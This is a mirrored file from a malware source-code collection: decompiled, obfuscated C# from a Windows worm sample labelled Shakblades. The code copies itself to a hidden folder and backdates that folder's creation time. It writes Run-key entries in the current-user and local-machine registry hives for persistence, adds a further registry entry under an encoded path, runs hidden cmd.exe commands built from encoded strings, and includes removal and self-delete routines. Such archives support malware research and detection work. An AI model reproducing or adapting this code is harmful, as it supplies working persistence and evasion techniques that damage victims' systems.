mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-01 16:05:27 +00:00
f2ac1ece55
add
194 lines
6.9 KiB
C#
194 lines
6.9 KiB
C#
// Decompiled with JetBrains decompiler
|
||
// Type: Ҧ߲๒ʽ໙ୄᴘ.ɱªᕢ᳭ᬻ˫ԧᵢ
|
||
// Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
||
// MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033
|
||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe
|
||
|
||
using Microsoft.Win32;
|
||
using System;
|
||
using System.Diagnostics;
|
||
using System.IO;
|
||
|
||
namespace Ҧ߲๒ʽ໙ୄᴘ
|
||
{
|
||
internal class ɱªᕢ᳭ᬻ\u02EBԧᵢ
|
||
{
|
||
public static void ᅰ()
|
||
{
|
||
ɱªᕢ᳭ᬻ\u02EBԧᵢ.P();
|
||
ɱªᕢ᳭ᬻ\u02EBԧᵢ.ᯁព();
|
||
ɱªᕢ᳭ᬻ\u02EBԧᵢ.ᶏපϔẞ();
|
||
}
|
||
|
||
private static void P()
|
||
{
|
||
try
|
||
{
|
||
if (!Directory.Exists(ȩזြڹᡡỾỔው.ౡ\u000F))
|
||
Directory.CreateDirectory(ȩזြڹᡡỾỔው.ౡ\u000F);
|
||
}
|
||
catch
|
||
{
|
||
}
|
||
try
|
||
{
|
||
File.Copy(Process.GetCurrentProcess().MainModule.FileName, Path.Combine(ȩזြڹᡡỾỔው.ౡ\u000F, \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u0CEE᮸ᴑ, true)), true);
|
||
}
|
||
catch
|
||
{
|
||
}
|
||
try
|
||
{
|
||
if (ȩזြڹᡡỾỔው.\u09C7)
|
||
{
|
||
Random random = new Random();
|
||
int day = random.Next(1, 28);
|
||
int month = random.Next(1, 12);
|
||
int year = random.Next(2000, DateTime.Now.Year);
|
||
Directory.SetCreationTime(Path.Combine(ȩזြڹᡡỾỔው.ౡ\u000F, \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u0CEE᮸ᴑ, true)), new DateTime(year, month, day));
|
||
}
|
||
}
|
||
catch
|
||
{
|
||
}
|
||
if (ȩזြڹᡡỾỔው.όᘂ\u1CCCᥓ\u005B)
|
||
{
|
||
try
|
||
{
|
||
File.SetAttributes(ȩזြڹᡡỾỔው.ౡ\u000F, FileAttributes.Hidden | FileAttributes.NotContentIndexed);
|
||
}
|
||
catch
|
||
{
|
||
}
|
||
}
|
||
if (!ȩזြڹᡡỾỔው.\u0B6E೮ᔙᩢ᷵ጔổ)
|
||
return;
|
||
try
|
||
{
|
||
File.SetAttributes(Path.Combine(ȩזြڹᡡỾỔው.ౡ\u000F, \u1928ᔾዔ.յ(ȩזြڹᡡỾỔው.\u0CEE᮸ᴑ, true)), FileAttributes.Hidden | FileAttributes.NotContentIndexed);
|
||
}
|
||
catch
|
||
{
|
||
}
|
||
}
|
||
|
||
public static void ᶏපϔẞ()
|
||
{
|
||
try
|
||
{
|
||
if (ȩזြڹᡡỾỔው.\u1C42\u193Eᙁᖔᠮ೬\u1BFB)
|
||
Registry.CurrentUser.CreateSubKey(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("FjIpNzokNSgfECwmNTI2Mik3HxosMcO+nOsnMjo2HwY4NTUoMTcZKDU2LDIxHxU4MQ==", true)).SetValue(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u1B65ᬧౢzƎ, true), (object) (ȩזြڹᡡỾỔው.ౡ\u000F + "\\" + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u0CEE᮸ᴑ, true)));
|
||
}
|
||
catch
|
||
{
|
||
}
|
||
try
|
||
{
|
||
if (ȩזြڹᡡỾỔው.கພ༢ਊȷඣᯇᝨ)
|
||
Registry.LocalMachine.CreateSubKey(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("FjIpNzokNSgfECwmNTI2Mik3HxosMcO+nOsnMjo2HwY4NTUoMTcZKDU2LDIxHxU4MQ==", true)).SetValue(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u1B65ᬧౢzƎ, true), (object) (ȩזြڹᡡỾỔው.ౡ\u000F + "\\" + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u0CEE᮸ᴑ, true)));
|
||
}
|
||
catch
|
||
{
|
||
}
|
||
try
|
||
{
|
||
if (!ȩזြڹᡡỾỔው.ԑᅤᴨᡰ\u02EFᣢỳ)
|
||
return;
|
||
RegistryKey subKey = Registry.LocalMachine.CreateSubKey(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("FhIJFxoEFQgfECwmNTI2Mik3HwQmNyw5KOPDvpzrFig3ODMfDDE2NyQvLygn4wYyMDMyMSgxNzYf", true) + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.ụү᳗, true));
|
||
subKey.SetValue("Fjc4JcO+nOsTJDcr", (object) (ȩזြڹᡡỾỔው.ౡ\u000F + "\\" + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u0CEE᮸ᴑ, true)));
|
||
subKey.SetValue("BjAGKzC99eEAMR4pKSIh", (object) 1, RegistryValueKind.DWord);
|
||
}
|
||
catch
|
||
{
|
||
}
|
||
}
|
||
|
||
private static void ᯁព()
|
||
{
|
||
try
|
||
{
|
||
Process process = new Process();
|
||
process.StartInfo = new ProcessStartInfo()
|
||
{
|
||
FileName = "cmd.exe",
|
||
UseShellExecute = false,
|
||
RedirectStandardInput = true,
|
||
CreateNoWindow = true,
|
||
WindowStyle = ProcessWindowStyle.Hidden
|
||
};
|
||
process.Start();
|
||
StreamWriter standardInput = process.StandardInput;
|
||
standardInput.WriteLine("cd " + ȩזြڹᡡỾỔው.ౡ\u000F);
|
||
standardInput.WriteLine(string.Format(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("KCYrMuMePTIxKBc1JDE2KSg1IB0yMSgMB8O+nOvjAOP14wHjPvNA/R0SEQjxLCcoMTcsKSwoNQ==", true), (object) \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u0CEE᮸ᴑ, true)));
|
||
standardInput.Close();
|
||
process.Kill();
|
||
}
|
||
catch
|
||
{
|
||
}
|
||
}
|
||
|
||
public static void \u171D\u0018ẖေᒷᐦᵨỨ()
|
||
{
|
||
try
|
||
{
|
||
Registry.CurrentUser.CreateSubKey(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("FjIpNzokNSgfECwmNTI2Mik3HxosMcO+nOsnMjo2HwY4NTUoMTcZKDU2LDIxHxU4MQ==", true)).DeleteValue(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u1B65ᬧౢzƎ, true));
|
||
}
|
||
catch
|
||
{
|
||
}
|
||
try
|
||
{
|
||
Registry.LocalMachine.CreateSubKey(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("FjIpNzokNSgfECwmNTI2Mik3HxosMcO+nOsnMjo2HwY4NTUoMTcZKDU2LDIxHxU4MQ==", true)).DeleteValue(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u02DBˬଋธ, true));
|
||
}
|
||
catch
|
||
{
|
||
}
|
||
try
|
||
{
|
||
Registry.LocalMachine.DeleteSubKey(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("FhIJFxoEFQgfECwmNTI2Mik3HwQmNyw5KOPDvpzrFig3ODMfDDE2NyQvLygn4wYyMDMyMSgxNzYf", true) + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.ụү᳗, true));
|
||
}
|
||
catch
|
||
{
|
||
}
|
||
try
|
||
{
|
||
switch (ȩזြڹᡡỾỔው.Փᬃᜐᣖ̗ᨠᵴ)
|
||
{
|
||
case RegistryHive.CurrentUser:
|
||
Registry.CurrentUser.DeleteSubKey(ȩזြڹᡡỾỔው.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ);
|
||
break;
|
||
case RegistryHive.LocalMachine:
|
||
Registry.LocalMachine.DeleteSubKey(ȩזြڹᡡỾỔው.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ);
|
||
break;
|
||
}
|
||
}
|
||
catch
|
||
{
|
||
}
|
||
ɱªᕢ᳭ᬻ\u02EBԧᵢ.\u0AFD();
|
||
}
|
||
|
||
public static void \u0AFD()
|
||
{
|
||
try
|
||
{
|
||
string tempFileName = Path.GetTempFileName();
|
||
File.Delete(tempFileName);
|
||
File.Move(Process.GetCurrentProcess().MainModule.FileName, tempFileName);
|
||
\u0667Ѹ.\u1936\u0A50Ȁ\u0A84ᠬ\u1AE7(tempFileName, (string) null, \u0667Ѹ.ቩᩬᐜ̯ṅडၿ.ᑹ\u17FCנᒞ͍ሴǒ);
|
||
}
|
||
catch (Exception ex)
|
||
{
|
||
}
|
||
}
|
||
|
||
public enum \u0EF7ᶟᔂᢪĉᤘᢁַắ
|
||
{
|
||
የ᠖\u0E6Cᬰᥥ,
|
||
ฏᆈǸ᱙Ȏ\u1CFD༾,
|
||
\u05AFᩚၡ\u00F7ᩯ\u1B4Cጝ,
|
||
}
|
||
}
|
||
}
|